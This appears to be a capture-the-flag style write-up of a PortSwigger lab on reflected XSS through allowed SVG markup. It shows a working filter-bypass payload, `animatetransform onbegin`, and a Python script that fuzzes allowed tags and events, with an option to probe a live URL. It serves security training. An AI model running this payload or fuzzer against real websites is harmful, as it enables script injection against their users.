16) Reflected XSS with some SVG markup allowed

Locate possible injection points
As usual, the first step is to analyse the application. It has a search functionality, so let's search for a random string, then open the developer tools and find where the user input is reflected in the HTML.

The obvious tags are blocked by the application, so we need to find out which ones get through.

Let's use Burp Intruder to find all the allowed tags.

Now let's copy all the tags from the PortSwigger XSS cheat sheet into the payload list, with the payload position on the tag name (e.g. `<§§>`).


Start the attack and click on the Status column to group the requests that returned 200: those are the tags the filter lets through.

Using the PortSwigger cheat sheet we've found some XSS payloads that use those tags.

But before testing them we have to find the allowed events, using Burp Intruder again.

Now let's copy all the events from the PortSwigger XSS cheat sheet into the payload list, placing the payload position on the event name inside a tag that we already know is allowed (otherwise every request fails on the tag and tells us nothing about the event).


Now click on Start attack and, as before, keep the requests that returned 200.

Payload:
<svg><animatetransform onbegin=alert(1) attributeName=transform>
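The enumeration done with Intruder in the steps above, as an added Python script that is not part of the original writeup. The tag and event lists are short constructed excerpts of the cheat sheet, `mock_probe` is a constructed stand-in for the lab's filter (its allow-lists are an assumption, not the lab's real rules), and `http_probe` shows how the same loop would be pointed at a live search URL (assumed to take the payload in a `search` query parameter).

```python
"""Offline model of the tag/event enumeration done with Burp Intruder."""
import re
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, Iterable, List

# Constructed excerpts of the PortSwigger XSS cheat sheet lists (the real
# lists are much longer; these are enough to show the method).
TAGS = ["a", "body", "img", "script", "iframe", "svg", "animatetransform",
        "animate", "set", "title", "image", "video"]
EVENTS = ["onload", "onerror", "onclick", "onmouseover", "onfocus",
          "onbegin", "onend", "onrepeat", "onanimationstart"]

Probe = Callable[[str], int]  # payload -> HTTP status code


def tag_probe(tag: str) -> str:
    return f"<{tag}>"


def event_probe(tag: str, event: str) -> str:
    # Fuzz events inside a tag that already passes the filter; otherwise
    # every request fails on the tag and says nothing about the event.
    return f"<{tag} {event}=1>"


def enumerate_allowed(candidates: Iterable[str], build: Callable[[str], str],
                      probe: Probe) -> List[str]:
    # Same logic as sorting Intruder results by status: keep the 200s.
    return [c for c in candidates if probe(build(c)) == 200]


def build_payload(tag: str, event: str) -> str:
    # attributeName is required: without a real animation target the
    # element never begins animating, so onbegin never fires.
    return f"<svg><{tag} {event}=alert(1) attributeName=transform>"


def http_probe(search_url: str, timeout: float = 5.0) -> Probe:
    """Live probe: GET search_url + url-encoded payload, return the status.

    search_url is assumed to end with '?search=' (an assumption about the
    target, not something this script verifies)."""
    def probe(payload: str) -> int:
        url = search_url + urllib.parse.quote(payload, safe="")
        try:
            with urllib.request.urlopen(url, timeout=timeout) as resp:
                return resp.status
        except urllib.error.HTTPError as exc:
            return exc.code
    return probe


# Constructed stand-in for the lab's filter so the script runs offline.
# These allow-lists are an assumption, not the lab's real rules.
MOCK_ALLOWED_TAGS = {"svg", "animatetransform", "title", "image"}
MOCK_ALLOWED_EVENTS = {"onbegin", "onend", "onrepeat"}
_TAG_RE = re.compile(r"<\s*([a-zA-Z][a-zA-Z0-9]*)")
_EVENT_RE = re.compile(r"\s(on[a-zA-Z]+)\s*=")


def mock_probe(payload: str) -> int:
    tags = {t.lower() for t in _TAG_RE.findall(payload)}
    events = {e.lower() for e in _EVENT_RE.findall(payload)}
    if tags - MOCK_ALLOWED_TAGS or events - MOCK_ALLOWED_EVENTS:
        return 400  # the filter rejects the tag or the event
    return 200


def find_payload(probe: Probe) -> str:
    """Run both Intruder phases and assemble the final payload."""
    tags = enumerate_allowed(TAGS, tag_probe, probe)
    # Prefer an SVG animation element, since those have begin/end events.
    host = next((t for t in tags if t in ("animatetransform", "animate", "set")), None)
    if host is None:
        raise RuntimeError(f"no animatable tag survived the filter: {tags}")
    events = enumerate_allowed(EVENTS, lambda e: event_probe(host, e), probe)
    event = next((e for e in events if e in ("onbegin", "onend", "onrepeat")), None)
    if event is None:
        raise RuntimeError(f"no animation event survived the filter: {events}")
    return build_payload(host, event)


if __name__ == "__main__":
    print(find_payload(mock_probe))
    # Against a live target (URL is a placeholder you must fill in):
    # print(find_payload(http_probe("https://TARGET/?search=")))
```

The two-phase order matters: the event phase reuses the first allowed animation tag found, so a 400 in that phase can only mean the event was rejected. Against the real lab, `http_probe` replaces `mock_probe`; nothing else changes.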


Submit it through the search box: the `attributeName=transform` attribute makes the animation actually start, so `onbegin` fires without any user interaction, the alert pops, and we have solved the lab.
